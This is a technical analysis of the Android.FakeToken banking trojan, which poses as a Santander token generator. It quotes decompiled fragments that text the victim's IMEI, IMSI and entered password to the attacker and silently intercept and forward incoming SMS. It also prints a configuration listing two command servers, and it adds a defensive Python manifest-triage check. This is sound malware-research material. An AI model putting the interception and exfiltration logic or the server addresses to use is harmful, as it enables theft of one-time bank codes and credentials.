Detailed Analysis of Android.FakeToken

Intro: What is Android.FakeToken?

This new malware family emerged some days ago in a Spanish spam campaign and spreads through email and SMS messages. It tries to forward mTAN SMS messages to a remote user and thus has the typical man-in-the-middle functionality we have already seen in malware families like Zeus and SpyEye, but it can also be controlled remotely and doesn't need to infect the user's PC.

Analysis of the Application and Its Structure

During installation, the app requests the following permissions:

  • android.permission.READ_PHONE_STATE
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.SEND_SMS
  • android.permission.RECEIVE_SMS
  • android.permission.INTERNET
  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.INSTALL_PACKAGES
  • android.permission.DELETE_PACKAGES
  • android.permission.READ_CONTACTS
  • android.permission.RECEIVE_BOOT_COMPLETED

After the application has been installed successfully, its icon shows up in the dashboard and the application registers several receivers that are triggered when a specific system event occurs (for example BOOT_COMPLETED, USER_PRESENT, PHONE_STATE or SMS_RECEIVED). When the user launches the app, it shows a WebView component displaying an HTML page that looks like a token generator and appears to come from the targeted bank (in our case it is meant to look like the Santander Consumer Bank):

localWebView.addJavascriptInterface(new WebApi(this), "android");
System.out.println("Build.VERSION.RELEASE: " + Build.VERSION.RELEASE);
if ((Build.VERSION.RELEASE.startsWith("2.3.1")) || (Build.VERSION.RELEASE.startsWith("2.3.3")))
      localWebView.loadUrl("file:///android_asset/html/index_bag.html");
....

To get the fake token (just a random number), the user must enter the first factor of authentication. As soon as this step is done, the application sends an SMS message to the author and then starts a background service:

public void sendPass(String paramString)
  {
    try
    {
      if (!Settings.saved.sendInitSms)
      {
        Settings.saved.sendInitSms = true;
        String str = Settings.saved.smsPrefix + " INIT " + MainApplication.imei + " " + MainApplication.imsi + " " + paramString;
        MainService.sendSms(Settings.saved.number, str);
        MainApplication.settings.save(this.context);
      }
....

This background service starts periodically and listens for commands from the remote server (e.g. a configuration update). When the victim's smartphone receives an SMS message, the broadcast is aborted and the message is forwarded to a given phone number or remote server.

abortBroadcast();
SmsMessage localSmsMessage = arrayOfSmsMessage[j];
String str1 = localSmsMessage.getOriginatingAddress();
String str2 = localSmsMessage.getMessageBody();
CatchResult localCatchResult = MainApplication.settings.isCatchMessage(str1, str2);
if (localCatchResult.result)
   MainService.start(paramContext, paramIntent, "catch", str1, str2, localCatchResult.key);
if ((MainApplication.settings.isNewServer(paramContext, str1, str2)) || (MainApplication.settings.isDeleteMessage(str1, str2)))

The application sends the IMEI, IMSI, phone type, version, sid, phone number and the SMS body in an HTTP POST to one of the corresponding remote servers. These servers and all other necessary information are stored in an XML configuration file (/data/data/token.generator/files/settings):


   
   
   79021121067
   1.0
   santander
   
   
      http://icoolshop.ru/cp/server.php
      http://iconsshopbest.com/cp/server.php
   
   qe4faf23r4e2
   sid_1
   false
   1331934321409
   43200

This file can be updated remotely (via SMS and HTTP GET) if the phone number or server address of the malware author changes. The malware can also install further APK files, and it sends the phone numbers of all entries in the victim's address book to a remote server. This last step is probably meant to support further distribution of the malware.
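As an added example (not code from the sample or from the original analysis), the following Python function checks a decoded AndroidManifest.xml, for instance one produced by apktool, for the trait combination described above: the SMS receive/send permission pair, the package-management, contacts and boot permissions, and receivers for the listed system events. The sample manifest, its class names and the priority check are assumptions: on the 2.3.x releases the sample tests for, SMS_RECEIVED is an ordered broadcast, so a receiver registered with a raised priority can abort it before the SMS app sees the message.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace
SMS_PAIR = {"android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"}
EXTRA = {"android.permission.INSTALL_PACKAGES", "android.permission.DELETE_PACKAGES",
         "android.permission.READ_CONTACTS", "android.permission.RECEIVE_BOOT_COMPLETED"}
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
TRIGGERS = {SMS_RECEIVED, "android.intent.action.BOOT_COMPLETED",
            "android.intent.action.USER_PRESENT", "android.intent.action.PHONE_STATE"}

def triage_manifest(manifest_xml):
    """Return the interception-related traits found in a decoded AndroidManifest.xml."""
    root = ET.fromstring(manifest_xml)
    perms = {e.get(A + "name") for e in root.iter("uses-permission")}
    receivers = []  # (receiver name, triggering action, intent-filter priority)
    for rcv in root.iter("receiver"):
        for flt in rcv.iter("intent-filter"):
            prio = int(flt.get(A + "priority", "0"))
            for act in flt.iter("action"):
                if act.get(A + "name") in TRIGGERS:
                    receivers.append((rcv.get(A + "name"), act.get(A + "name"), prio))
    sms_hooks = [r for r in receivers if r[1] == SMS_RECEIVED]
    return {
        "sms_pair": SMS_PAIR <= perms,
        "extra_permissions": sorted(p.rsplit(".", 1)[1] for p in EXTRA & perms),
        "receivers": receivers,
        # Receive + send SMS plus an SMS_RECEIVED receiver is the forwarding pattern;
        # a raised priority lets that receiver run (and abort) before the SMS app.
        "can_forward_sms": SMS_PAIR <= perms and bool(sms_hooks),
        "can_hide_sms": any(prio > 0 for _, _, prio in sms_hooks),
    }

# Constructed sample manifest (package, class names and priority are made up).
SAMPLE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.tokengen">
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application>
    <receiver android:name=".SmsReceiver"><intent-filter android:priority="999">
      <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
    </intent-filter></receiver>
    <receiver android:name=".BootReceiver"><intent-filter>
      <action android:name="android.intent.action.BOOT_COMPLETED"/>
    </intent-filter></receiver>
  </application>
</manifest>"""
```

A result with both `can_forward_sms` and `can_hide_sms` set is a reason to look at the receiver's code, not a verdict on its own; legitimate SMS apps also request these permissions.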

Sample Information:

sha256:
f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79

md5:
4548973449f707a6359a9b321ef54d31

Mobile-Sandbox Report
